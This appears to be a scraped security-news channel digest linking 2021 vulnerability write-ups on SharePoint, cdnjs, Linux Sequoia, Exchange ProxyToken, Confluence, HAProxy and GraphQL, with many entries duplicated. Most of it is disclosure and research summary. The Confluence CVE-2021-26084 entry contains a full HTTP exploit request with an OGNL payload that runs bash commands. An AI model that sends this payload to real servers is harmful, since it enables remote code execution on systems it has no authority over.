CVE-2021-28474: SHAREPOINT RCE VIA SERVER-SIDE CONTROL INTERPRETATION CONFLICT
👤 by @thezdi
The vulnerability allows authenticated users to execute arbitrary .NET code on the server in the context of the service account of the SharePoint web application. By default, authenticated SharePoint users have all necessary permissions.
📝 Contents:
• The Vulnerability
• Exploitation
• Proof of Concept
• Getting Remote Code Execution
• Conclusion
https://www.zerodayinitiative.com/blog/2021/7/7/cve-2021-28474-sharepoint-remote-code-execution-via-server-side-control-interpretation-conflict
👤 by @thezdi
The vulnerability allows authenticated users to execute arbitrary .NET code on the server in the context of the service account of the SharePoint web application. By default, authenticated SharePoint users have all necessary permissions.
📝 Contents:
• The Vulnerability
• Exploitation
• Proof of Concept
• Getting Remote Code Execution
• Conclusion
https://www.zerodayinitiative.com/blog/2021/7/7/cve-2021-28474-sharepoint-remote-code-execution-via-server-side-control-interpretation-conflict
Zero Day Initiative
Zero Day Initiative — CVE-2021-28474: SharePoint Remote Code Execution via Server-Side Control Interpretation Conflict
In May of 2021, Microsoft released a patch to correct CVE-2021-28474 , a remote code execution bug in supported versions of Microsoft SharePoint Server. This bug was reported to ZDI by an anonymous researcher and is also known as ZDI-21-574 . This blog…
Remote code execution in cdnjs of Cloudflare
👤 by @ryotkak
A path traversal in Cloudfare's cdnjs library update server during archive extraction could be used to execute arbitrary commands, and as a result, cdnjs could be completely compromised, affecting around 12.7% of all websites on the internet once caches are expired.
📝 Contents:
• Preface
• TL;DR
• About cdnjs
• Reason for investigation
• Initial investigation
• Investigation of automatic update
• Path traversal
• Demonstration of vulnerability
• Incident
• Determinate impact
• Conclusion
• Timeline
https://blog.ryotak.me/post/cdnjs-remote-code-execution-en/
👤 by @ryotkak
A path traversal in Cloudfare's cdnjs library update server during archive extraction could be used to execute arbitrary commands, and as a result, cdnjs could be completely compromised, affecting around 12.7% of all websites on the internet once caches are expired.
📝 Contents:
• Preface
• TL;DR
• About cdnjs
• Reason for investigation
• Initial investigation
• Investigation of automatic update
• Path traversal
• Demonstration of vulnerability
• Incident
• Determinate impact
• Conclusion
• Timeline
https://blog.ryotak.me/post/cdnjs-remote-code-execution-en/
blog.ryotak.net
Remote code execution in cdnjs of Cloudflare
Preface
(日本語版も公開されています。)
Cloudflare, which runs cdnjs, is running a “Vulnerability Disclosure Program” on HackerOne, which allows hackers to perform vulnerability assessments.
This article describes vulnerabilities reported through this program and published…
(日本語版も公開されています。)
Cloudflare, which runs cdnjs, is running a “Vulnerability Disclosure Program” on HackerOne, which allows hackers to perform vulnerability assessments.
This article describes vulnerabilities reported through this program and published…
Sequoia: A Local Privilege Escalation Vulnerability in Linux’s Filesystem Layer (CVE-2021-33909)
👤 by Bharat Jogi
"The Qualys Research Team has discovered a size_t-to-int type conversion vulnerability in the Linux Kernel’s filesystem layer affecting most Linux operating systems. Any unprivileged user can gain root privileges on a vulnerable host by exploiting this vulnerability in a default configuration."
📝 Contents:
• About Linux Filesystem
• Impact
• Disclosure Timeline
• Proof of Concept Video
• Technical Details
• Solution
• Qualys Coverage
• Dashboard
• Vendor References
• Frequently Asked Questions (FAQs)
https://blog.qualys.com/vulnerabilities-threat-research/2021/07/20/sequoia-a-local-privilege-escalation-vulnerability-in-linuxs-filesystem-layer-cve-2021-33909
👤 by Bharat Jogi
"The Qualys Research Team has discovered a size_t-to-int type conversion vulnerability in the Linux Kernel’s filesystem layer affecting most Linux operating systems. Any unprivileged user can gain root privileges on a vulnerable host by exploiting this vulnerability in a default configuration."
📝 Contents:
• About Linux Filesystem
• Impact
• Disclosure Timeline
• Proof of Concept Video
• Technical Details
• Solution
• Qualys Coverage
• Dashboard
• Vendor References
• Frequently Asked Questions (FAQs)
https://blog.qualys.com/vulnerabilities-threat-research/2021/07/20/sequoia-a-local-privilege-escalation-vulnerability-in-linuxs-filesystem-layer-cve-2021-33909
Qualys
Sequoia: A Local Privilege Escalation Vulnerability in Linux’s Filesystem Layer (CVE-2021-33909) | Qualys
The Qualys Research Team has discovered a size_t-to-int type conversion vulnerability in the Linux Kernel’s filesystem layer affecting most Linux operating systems. Any unprivileged user can gain root…
Cisco fixed a Post-Auth RCE (CVE-2021-1518) in Firepower Device Manager found by our researchers Nikita Abramov and Mikhail Klyuchnikov.
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fdm-rce-Rx6vVurq
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fdm-rce-Rx6vVurq
You should turn off autofill in your password manager
👤 by @marektoth
11 of the 16 tested browser and password manager combinations, using default configurations and adhering to best-practices, could be compromised in one mouse click by the user, allowing attackers access to plain-text saved login credentials.
📝 Contents:
• Autofill
• Autofill in chromium-based browsers
• Abuse of the autofill? Cross-Site Scripting (XSS)
• Analysis of browsers and password managers
• Limitation
• Script and demo
• Clickjacking KeePassXC-Browser
• Potential risks for users
• Potential risks for companies / Recommendation for InfoSec
• Recommendation
• Conclusion
https://marektoth.com/blog/password-managers-autofill/
👤 by @marektoth
11 of the 16 tested browser and password manager combinations, using default configurations and adhering to best-practices, could be compromised in one mouse click by the user, allowing attackers access to plain-text saved login credentials.
📝 Contents:
• Autofill
• Autofill in chromium-based browsers
• Abuse of the autofill? Cross-Site Scripting (XSS)
• Analysis of browsers and password managers
• Limitation
• Script and demo
• Clickjacking KeePassXC-Browser
• Potential risks for users
• Potential risks for companies / Recommendation for InfoSec
• Recommendation
• Conclusion
https://marektoth.com/blog/password-managers-autofill/
Marektoth
You should disable autofill in your password manager
Security Researcher | Ethical Hacker | Web Application Security
NTLM relaying to AD CS - On certificates, printers and a little hippo
👤 by @_dirkjan
More Active Directory NTLM relaying wizardry from Dirk-jan, this time aggregating and unifying multiple different tools and techniques, culminating in the release of PKINITtools.
📝 Contents:
• Background - the state of NTLM relaying
• Exploring AD CS relaying
• Abusing the obtained certificate - diving into PKINIT
• Obtaining the NT hash of the impersonated computer account
• Using S4U2Self to obtain access to the relayed machine
• Other abuse avenues of PetitPotam
• Defenses
• Credits / Thanks / Tools
https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/
👤 by @_dirkjan
More Active Directory NTLM relaying wizardry from Dirk-jan, this time aggregating and unifying multiple different tools and techniques, culminating in the release of PKINITtools.
📝 Contents:
• Background - the state of NTLM relaying
• Exploring AD CS relaying
• Abusing the obtained certificate - diving into PKINIT
• Obtaining the NT hash of the impersonated computer account
• Using S4U2Self to obtain access to the relayed machine
• Other abuse avenues of PetitPotam
• Defenses
• Credits / Thanks / Tools
https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/
dirkjanm.io
NTLM relaying to AD CS - On certificates, printers and a little hippo
I did not expect NTLM relaying to be a big topic again in the summer of 2021, but among printing nightmares and bad ACLs on registry hives, there has been quite some discussion around this topic. Since there seems to be some confusion out there on the how…
SAML is insecure by design
👤 by @joonas_fi
"In summary: once you base your security on some computed property, you can now exploit any flaws, differences or ambiguity in this computation. The more complex the computation is, the more dangerous it gets."
📝 Contents:
• What is SAML?
• Why should I care?
• Why is SAML insecure?
• Why is signing computed values dangerous?
• The SAML vulnerability in practice
• Why is SAML this way?
• Vulnerability mitigation
• How could SAML have been designed better?
• More SAML weirdness
• Why is SAML used if it sucks?
• Action
• Ignorance is bliss
• Additional reading
https://joonas.fi/2021/08/saml-is-insecure-by-design/
👤 by @joonas_fi
"In summary: once you base your security on some computed property, you can now exploit any flaws, differences or ambiguity in this computation. The more complex the computation is, the more dangerous it gets."
📝 Contents:
• What is SAML?
• Why should I care?
• Why is SAML insecure?
• Why is signing computed values dangerous?
• The SAML vulnerability in practice
• Why is SAML this way?
• Vulnerability mitigation
• How could SAML have been designed better?
• More SAML weirdness
• Why is SAML used if it sucks?
• Action
• Ignorance is bliss
• Additional reading
https://joonas.fi/2021/08/saml-is-insecure-by-design/
joonas.fi
SAML is insecure by design
What is SAML? Security Assertion Markup Language (SAML) is an open standard for exchanging authentication and authorization data between parties.
Source: Wikipedia
SAML is often used for single-sign on (“Sign in with Google”, “Sign in with Twitter” etc.).…
Source: Wikipedia
SAML is often used for single-sign on (“Sign in with Google”, “Sign in with Twitter” etc.).…
This media is not supported in your browser
VIEW IN TELEGRAM
MyBB fixed a Persistent XSS (CVE-2021-27279) in MyBB < 1.8.25 found by our researcher Igor Sak-Sakovskiy.
RCE is possible when chained with CVE-2021-27890, reported by Simon Scannell & Carl Smith.
Advisory: https://mybb.com/versions/1.8.25/
RCE is possible when chained with CVE-2021-27890, reported by Simon Scannell & Carl Smith.
Advisory: https://mybb.com/versions/1.8.25/
🙈🙉🙊Citrix has removed the acknowledgement of our researcher Mikhail Klyuchnikov who discovered and reported CVE-2019-19781 - the Citrix ADC RCE!
Current: https://support.citrix.com/article/CTX267027
Mar 2021: http://web.archive.org/web/20210321090412/https://support.citrix.com/article/CTX267027
Current: https://support.citrix.com/article/CTX267027
Mar 2021: http://web.archive.org/web/20210321090412/https://support.citrix.com/article/CTX267027
PROXYTOKEN: AN AUTHENTICATION BYPASS IN MICROSOFT EXCHANGE SERVER
👤 by Simon Zuckerbraun
With this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users, for example copying all emails addressed to a target account and forwarding them to an attacker-controlled account. The vulnerability arises due to the authentication module not being loaded on the back end.
📝 Contents:
• The Trigger
• Understanding the Root Cause
• Bagging a Canary
• Conclusion
https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server
👤 by Simon Zuckerbraun
With this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users, for example copying all emails addressed to a target account and forwarding them to an attacker-controlled account. The vulnerability arises due to the authentication module not being loaded on the back end.
📝 Contents:
• The Trigger
• Understanding the Root Cause
• Bagging a Canary
• Conclusion
https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server
Zero Day Initiative
Zero Day Initiative — ProxyToken: An Authentication Bypass in Microsoft Exchange Server
Continuing with the theme of serious vulnerabilities that have recently come to light in Microsoft Exchange Server, in this article we present a new vulnerability we call ProxyToken. It was reported to the Zero Day Initiative in March 2021 by researcher Le…
Exploiting GraphQL
👤 by @infosec_au
Overview of GraphQL attacks.
📝 Contents:
• Intro
• BatchQL
• Introspection
• Suggestions
• CSRF
• JSON list based batching
• Query name based batching
• Conclusion
https://blog.assetnote.io/2021/08/29/exploiting-graphql/
👤 by @infosec_au
Overview of GraphQL attacks.
📝 Contents:
• Intro
• BatchQL
• Introspection
• Suggestions
• CSRF
• JSON list based batching
• Query name based batching
• Conclusion
https://blog.assetnote.io/2021/08/29/exploiting-graphql/
Remote Code Execution on Confluence Servers write-up (CVE-2021-26084)
👤 by rootxharsh and iamnoooob
Patch diffing the latest Confluence update results in RCE PoC.
PoC:
• Analyzing the hot patch
• Bypassing isSafeExpression
• Bonus - Better Payload
• Bonus - Debugging
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
👤 by rootxharsh and iamnoooob
Patch diffing the latest Confluence update results in RCE PoC.
PoC:
POST /pages/doenterpagevariables.action HTTP/2📝 Contents:
Host: localhost
Content-Length: 301
Content-Type: application/x-www-form-urlencoded
queryString=aaa\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022javax.script.ScriptEngineManager\u0022).newInstance().getEngineByName(\u0022js\u0022).eval(\u0022var x=new java.lang.ProcessBuilder;x.command([\u0027/bin/bash\u0027,\u0027-c\u0027,\u0027'.$cmd.'\u0027]);x.start()\u0022)}%2b\u0027
• Analyzing the hot patch
• Bypassing isSafeExpression
• Bonus - Better Payload
• Bonus - Debugging
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
GitHub
writeups/Confluence-RCE.md at main · httpvoid/writeups
Contribute to httpvoid/writeups development by creating an account on GitHub.
SAP refused to disclose which CVEs were assigned to vulnerabilities reported by our researcher Mikhail Klyuchnikov, if any.
Three subsequent letters remain unanswered.
We believe the CVEs to be CVE-2021-33690 (CVSS 9.9) and CVE-2021-33691 (CVSS 6.9) in the August hotfix.
Join the discussion on Twitter: https://twitter.com/ptswarm/status/1433070547399757824
Three subsequent letters remain unanswered.
We believe the CVEs to be CVE-2021-33690 (CVSS 9.9) and CVE-2021-33691 (CVSS 6.9) in the August hotfix.
Join the discussion on Twitter: https://twitter.com/ptswarm/status/1433070547399757824
RCE on a backend IIS server via file upload with an atypical file extension.
More community curated payloads can be found at https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP
More community curated payloads can be found at https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP
Critical Vulnerability in HAProxy (CVE-2021-40346): Integer Overflow Enables HTTP Smuggling
👤 by Ori Hollander and Or Peles
The vulnerability, CVE-2021-40346, is an Integer Overflow, triggerable via the Content-Length HTTP header, that makes it possible to conduct HTTP Request Smuggling attacks.
📝 Contents:
• Technical Background
• HTTP Request Smuggling
• HAProxy’s HTTP request processing phases (simplified)
• Attack Scenario – Bypassing http-request ACLs
• What happens inside HAProxy
• Getting the HTTP response for the smuggled request
• Attack demonstration – ACL bypass
• Vulnerability Details
• Automating the Discovery
• Fixes and Workarounds
https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/
👤 by Ori Hollander and Or Peles
The vulnerability, CVE-2021-40346, is an Integer Overflow, triggerable via the Content-Length HTTP header, that makes it possible to conduct HTTP Request Smuggling attacks.
📝 Contents:
• Technical Background
• HTTP Request Smuggling
• HAProxy’s HTTP request processing phases (simplified)
• Attack Scenario – Bypassing http-request ACLs
• What happens inside HAProxy
• Getting the HTTP response for the smuggled request
• Attack demonstration – ACL bypass
• Vulnerability Details
• Automating the Discovery
• Fixes and Workarounds
https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/
JFrog
Critical Vulnerability in HAProxy (CVE-2021-40346): Integer Overflow Enables HTTP Smuggling
JFrog Security research teams are constantly looking for new and previously unknown vulnerabilities in popular open-source projects to help improve their security posture. As part of this effort, we recently discovered a potentially critical vulnerability…
The complete GraphQL Security Guide: Fixing the 13 most common GraphQL Vulnerabilities to make your API production ready
👤 by @jensneuse_de
The complete GraphQL security guide. 'Nuff said.
📝 Contents:
• The 13 most common GraphQL Vulnerabilities
• Solving the 13 most common GraphQL Vulnerabilities for private APIs
• Solving the 13 most common GraphQL Vulnerabilities for public APIs
https://wundergraph.com/blog/the_complete_graphql_security_guide_fixing_the_13_most_common_graphql_vulnerabilities_to_make_your_api_production_ready
👤 by @jensneuse_de
The complete GraphQL security guide. 'Nuff said.
📝 Contents:
• The 13 most common GraphQL Vulnerabilities
• Solving the 13 most common GraphQL Vulnerabilities for private APIs
• Solving the 13 most common GraphQL Vulnerabilities for public APIs
https://wundergraph.com/blog/the_complete_graphql_security_guide_fixing_the_13_most_common_graphql_vulnerabilities_to_make_your_api_production_ready
WunderGraph
The complete GraphQL Security Guide: Fixing the 13 most common GraphQL Vulnerabilities to make your API production ready
A description of the 13 most common GraphQL vulnerabilities and how to mitigate them.